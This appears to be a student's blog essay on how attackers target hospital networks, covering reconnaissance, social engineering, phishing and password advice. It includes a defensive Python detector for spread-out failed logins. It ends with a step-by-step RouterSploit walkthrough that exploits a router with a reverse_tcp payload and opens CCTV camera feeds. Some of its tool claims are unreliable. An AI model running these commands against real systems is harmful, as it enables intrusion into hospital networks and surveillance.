Cyber security for hospitals


-BY ADITYA SINGH aditya043k@gmail.com






I chose this topic to write on because no one knows about how hackers can exploit hospitals through cyberattacks. In this blog I have tried to cover many topics on how hackers gain access to medical appliances and machines. I hope that this topic is helpful for hospital administration.




Gone forever are the days when a patient was treated by a single physician. Today, a team of physicians and specialized medical technicians rely on complex medical equipment to diagnose and treat patients. This collaboration is made possible because electronic medical records (EMRs) securely store large amounts of medical and clinical information, which is exchanged electronically among healthcare entities by an industry-specific Medical-Grade Network (MGN). This medical information is susceptible to being stolen or held for ransom, and malicious hackers can even take direct control of connected active and passive medical devices over the internet and injure patients. The Health Information Technology for Economic and Clinical Health (HITECH) Act of 2009 provided financial incentives for Medicare and Medicaid providers who become “meaningful users” of EMRs. Among non-federal acute care hospitals, 76 percent were using a “basic” system by 2014. As of May 2015, more than 468,000 Medicare and Medicaid providers (87 percent) have received payments through the HITECH Act, totaling approximately $30.4 billion. As the implementation of the HITECH Act expanded, so has the cost of data breaches at healthcare facilities in the United States.


 






















Footprinting
Footprinting is how the hacker starts his analysis of the target hospital network. The hacker sifts through open source material found on the Internet to learn all he can about the hospital, including who works there, which equipment is used there, and where the equipment is located. A hacker may visit the hospital, sniff the wireless spectrum, look in dumpsters, and use social engineering to assemble a very good picture of the hospital and its active medical devices to determine where the vulnerabilities are. Once the hacker knows who manufactured the device that he intends to attack, he finds a copy of the operating and maintenance manuals (many are available online). Unfortunately, those manuals usually reveal the default password set at the factory. To make matters worse, some manufacturers recommend that the healthcare facility keep the default password, because this makes it easier for the manufacturer’s technician to test the equipment or perform maintenance. This same glaring vulnerability makes hacking the device simple. The hacker launches an account-harvesting attack to collect all the user account names on a computer network. Account harvesting involves using computer programs to search areas on the Internet to gather lists of email addresses from a number of sources, including chatrooms, domain names, instant message users, message boards, newsgroups, online directories for web pages belonging to professional societies, medical web pages, and other online destinations. A sophisticated hacker uses data mining to analyze a vast amount of information about a target hospital.
Many hackers resort to social engineering attacks. Social engineering is the art and science of getting people to do something that you want that they might not do in a normal course of action. In addition to collecting information by technical means, hackers apply various methods of social engineering, such as impersonating individuals on the telephone or other persuasive means (e.g., tricking, convincing, inducing, enticing, or provoking) to encourage someone to disclose valuable information.
Attackers look for information about who the target does business with: suppliers and customers. And they are particularly interested in IT support staff. They gather this information to better understand staff roles and responsibilities. They may use this information to pose as someone from one of their suppliers or vendors. Attackers look for information, such as birthdays, who was recently promoted, or who just had a baby. Hackers do not discount any information that they uncover. They even use bad relationships between the IT department and other offices as a wedge to gain information. Attackers send friend requests to hospital staff on Facebook, Match.com, LinkedIn, and any other Internet sites where people divulge personal information. Staff should never give away their GPS position, or location links, or send updates divulging where they will be on vacation. When asked, instead of saying “I’m going on vacation for two weeks,” I usually say, “I’m having a staycation and plan to sit at home cleaning my guns.” Hackers often use behavior-monitoring hacks. This involves observing the activities of hospital staff, MGN data traffic, and processes; and measuring activities against hospital policies and rules, baselines of normal activity, thresholds, and trends. Hackers have been known to resort to shoulder surfing, or using direct observation techniques, such as looking over a nurse’s shoulder to obtain personal access information (e.g., passwords, PINs, and security codes).
The hacker is not above dumpster diving to obtain passwords and the hospital’s directories by searching through discarded trash bins (also referred to as skipping). Eavesdropping is a low-tech technique that hackers use to listen in to a private conversation to acquire information that can provide access to an MGN.
A hacker may go so far as to install a screen scraper virus or physical device that logs and captures information sent to a hospital staffer’s computer display. If a hacker cannot physically visit the hospital, he could use PlaceRaider to create a virtual layout of the hospital’s interior. This is a novel Trojan horse visual malware app surreptitiously installed on a staffer’s smartphone. It allows a hacker to engage in remote reconnaissance to obtain geolocation data and enlist its accelerometer to create a 3D map of the phone’s surroundings. A hacker can download images of the physical space, study the environment, and carefully construct a three-dimensional model of indoor environments to survey the staffer’s private home or workplace. PlaceRaider can be used to photograph virtual objects in the environment, such as financial documents, information on computer monitors, and personally identifiable patient information.


Scanning
After hackers research the target hospital using open source websites, such as vendor marketing materials, awarded contracts, medical conference attendee lists, and LinkedIn and Facebook pages, the hacker searches the Shodan database of devices, which are accessible over the Internet. The Shodan database allows a hacker to find IP addresses and begin port scanning to identify which operating systems the hospital uses and then figure out how to access the hospital’s networks. If the target hospital is accessible by Shodan (it should not be), Shodan reveals all services running on the hospital’s computers, and allows hackers to share this information with others.




Shodan website


Shodan results from the screen







Other common network-discovery hacking tools include the Google Hacking Diggity Project, Nmap, Snort, Kismet, Nessus, McAfee, Sophia, and Bandolier.
Once the hacker knows which software applications are running on the target hospital’s network, he can develop a specific set of tools to exploit known vulnerabilities. For example, let’s say that the hacker learns that the building controls system at the target hospital is running Siemens SIMATIC STEP 7 TIA (Portal). In February 2015, Siemens reported two vulnerabilities on that software. One vulnerability allows a successful, remote man-in-the-middle attack. The other allows a hacker with local access to reconstruct protection level passwords. Although a Siemens software update is available, it is likely that it hasn’t been installed in many hospitals. A hacker will probably launch an address space probe attack when he finds your hospital networks on the Shodan website and locates your IP address space. The hacker is looking for security holes that might be exploited on the hospital’s network, such as unpatched vulnerabilities. A hacker uses a passive technique called network sniffing to monitor hospital network communication, decode protocols, and examine headers and network traffic for information of interest. It is both a review technique and target identification and analysis technique. The hacker may launch a probing attack to attempt to connect to well-known services that may be running on the hospital network to see which operating system exists and potentially identify the version of the software that it is running. A smart hacker will attempt a few common usernames and password combinations on several computers, resulting in failed login attempts. This is called a doorknob-rattling attack and can go undetected unless the data related to login failures from all the hosts is collected and aggregated to check for doorknob rattling from any remote destination. If the hacker is really ambitious, he may resort to emanations analysis, or obtaining data by monitoring and resolving electronic signals emitted by medical equipment that contains the data, but is not designed to communicate the data.
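
The aggregation described above for spotting doorknob rattling, as an added example that is not part of the original post: failed logins from every host are grouped by remote source, and a source is flagged when it fails on several hosts but only a few times on each. The log format, host names, addresses and thresholds are constructed assumptions for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: sshd-style failure lines as a central collector might
# receive them from several hospital hosts (names and addresses are made up).
SAMPLE_LOGS = """\
2024-03-01T02:00:05 emr-db01 sshd[811]: Failed password for admin from 203.0.113.7 port 50122 ssh2
2024-03-01T02:03:40 pacs-01 sshd[402]: Failed password for root from 203.0.113.7 port 50310 ssh2
2024-03-01T02:07:12 nurse-ws14 sshd[977]: Failed password for invalid user service from 203.0.113.7 port 50544 ssh2
2024-03-01T02:11:55 bms-gw sshd[120]: Failed password for admin from 203.0.113.7 port 50790 ssh2
2024-03-01T02:12:30 emr-db01 sshd[815]: Failed password for jsmith from 10.20.4.31 port 41000 ssh2
2024-03-01T02:12:41 emr-db01 sshd[815]: Failed password for jsmith from 10.20.4.31 port 41002 ssh2
2024-03-01T09:30:00 pacs-01 sshd[460]: Failed password for root from 198.51.100.9 port 33100 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+")

def parse(text):
    """Yield (timestamp, host, user, source) for each failed-login line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield datetime.fromisoformat(m["ts"]), m["host"], m["user"], m["src"]

def find_doorknob_rattling(text, min_hosts=3, max_per_host=2,
                           window=timedelta(hours=1)):
    """Flag sources that fail on many hosts but only a few times on each."""
    by_src = defaultdict(list)
    for ts, host, user, src in parse(text):
        by_src[src].append((ts, host, user))
    findings = {}
    for src, events in by_src.items():
        events.sort()
        for i, (start, _, _) in enumerate(events):
            in_window = [e for e in events[i:] if e[0] - start <= window]
            per_host = defaultdict(int)
            for _, host, _ in in_window:
                per_host[host] += 1
            # Many hosts, few tries on each: stays under per-host lockout limits.
            if len(per_host) >= min_hosts and max(per_host.values()) <= max_per_host:
                findings[src] = {"hosts": sorted(per_host),
                                 "users": sorted({u for _, _, u in in_window})}
                break
    return findings

if __name__ == "__main__":
    print(find_doorknob_rattling(SAMPLE_LOGS))
```

No single host in the sample sees more than one failure from the flagged source, which is why per-host failure counters alone would miss it.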


Programs that are frequently installed together may be described as parts of the same spyware package, even if they function separately. The following are some examples:

CoolWebSearch (https://en.wikipedia.org/wiki/CoolWebSearch) is a group of programs that takes advantage of Internet Explorer vulnerabilities. The package directs traffic to advertisements on websites, including CoolWebSearch.com. It displays pop-up ads, rewrites search engine results, and alters the infected computer’s hosts file to direct Domain Name System (DNS) lookups to these sites.

HuntBar (https://en.wikipedia.org/wiki/HuntBar) is also known as WinTools or Adware.

Internet Optimizer, also known as DyFuCa, redirects Internet Explorer error pages to advertising. When users follow a broken link or enter an erroneous URL, they see a page of advertisements. However, because password-protected websites use the same mechanism as HTTP errors, Internet Optimizer makes it impossible for the user to access password-protected sites.


Network Mapping
By this point, the hacker can draw a very detailed layout of the hospital’s network and visualize the total network environment. The hacker’s network map is probably more current than your copy because he has found what’s actually there.

Oversimplified network map—the point is that everything’s connected









How Hackers Gain Access to a Healthcare Facility or Hospital Network
THE MOST COMMON ATTACK THAT A HACKER CAN DO IS:

Email Phishing Attack
Email is the preferred method of gaining access to any network that has Internet access. A hacker will send an email containing active content (carries out or triggers actions automatically without the intervention of a user), such as a Remote Access Trojan (RAT), to a hospital employee, such as a biomedical equipment technician (BMET) or a building maintenance technician. According to a 2015 data breach investigations report, 23 percent of recipients of phishing emails open them and 11 percent click an attachment. Typically, doctors, nurses, and building maintenance personnel access their email using the only workstation on their desk. I recommend that hospitals increase awareness of the importance of not opening suspicious emails.
The table lists some email do’s and don’ts.

DO’S
  • Always look for digital signatures.
  • Scan all attachments.

DON’TS
  • Don’t open suspicious emails.
  • Don’t use a preview pane for email, use plain text only.
  • Don’t click links to websites in any emails.
  • Don’t respond to the email that demands that you update information and gives a link to click.
  • Don’t respond to emails that threaten dire consequences.
  • Don’t open the email from strangers.



Appliance Hacks
A hacker can gain access to a hospital network through appliance hacks. With the growth of the Internet of Things, even common appliances such as dishwashers, coffee makers, clothes dryers, and nursery-room baby monitors connect to the Internet and could be used as an access and pivot point. Manufacturers use this capability to troubleshoot the performance of their equipment, monitor usage, and improve the customer “experience.” Unfortunately, knowing when you use the appliance provides data that could help hackers learn your habits and schedule, and geolocate your current position.


Password Cracker
Hackers have access to a wide range of tools to decrypt passwords that they find on a hospital network. The last resort is a brute-force attack using a program such as Zip Password Cracker Pro.

Cyber-Hygiene Password Tips

  • Use a strong password or passphrase.
  • Change the password every 90 days.
  • Never use a previous password again.
  • Use lowercase and uppercase letters, numbers, and special characters ($, #, ?, %, &, etc.).
  • Do not use a common phrase (123thequickbrownfox, etc.).
  • Don’t write down the password and slip it in the top drawer of your desk.
  • Password should be at least 14 characters.
  • Don’t give anyone your password—ever.

PRACTICAL TIME

NOW I WILL SHOW YOU HOW HACKERS GAIN ACCESS TO HOSPITAL CCTV CAMERAS BY EXPLOITING THE ROUTER {note that for this practical your Wi-Fi must support monitor mode}
OS used: Kali Linux

  • first, you have to download routersploit git package on your system
  • commands that you have to enter in the terminal
  • cd Desktop/
  • git clone https://github.com/threat9/routersploit
  • cd routersploit/
  • ls
  • pip3 install -r requirements.txt
  • ./rsf.py
  • show exploits
  • show creds
  • search tplink
  • show scanners
  • use scanners/routers/router_scan
  • show info
  • show options
  • ip r {to show router ip}
  • copy that IP
  • set target {ip of router}
  • nmap -sV {ip of your router}
  • set threads 30
  • if the target is vulnerable then write the commands
  • use exploits {copy the vulnerable link}
  • show options
  • set target {ip or r}
  • check
  • run
  • show payloads
  • set payload reverse_tcp
  • show options
  • set lhost {ip or r}
  • run
  • back
  • exit
  • back
  • use scanners/cameras/camera_scan
  • show info
  • show options
  • set target {ip}
  • set http_port 8080
  • run
  • copy link(1) 192.168….
  • and open in the browser
  • use any user name and password

AND IT’S DONE. NOW THE HACKER CAN SEE THE LIVE CCTV RECORDING. IF YOU DON’T BELIEVE IT, YOU CAN TRY IT YOURSELF :)

MORAL OF THIS PRACTICAL: HOSPITAL ADMINISTRATION MUST SCAN THEIR ROUTER EVERY MONTH FOR VULNERABILITIES AND FIX THEM AS SOON AS POSSIBLE.



IF THERE ARE ANY SPELLING OR GRAMMAR MISTAKES PLEASE IGNORE IT BUT I DON’T THINK IT WILL COME BECAUSE I HAVE CHECKED IT THRICE WHILE POSTING IT


THANK YOU
SUBMITTED BY: ADITYA SINGH
CLASS: XII-A
ROLL NO: 2
SCHOOL: KENDRIYA VIDYALAYA NO.2 EME BARODA (GUJARAT)
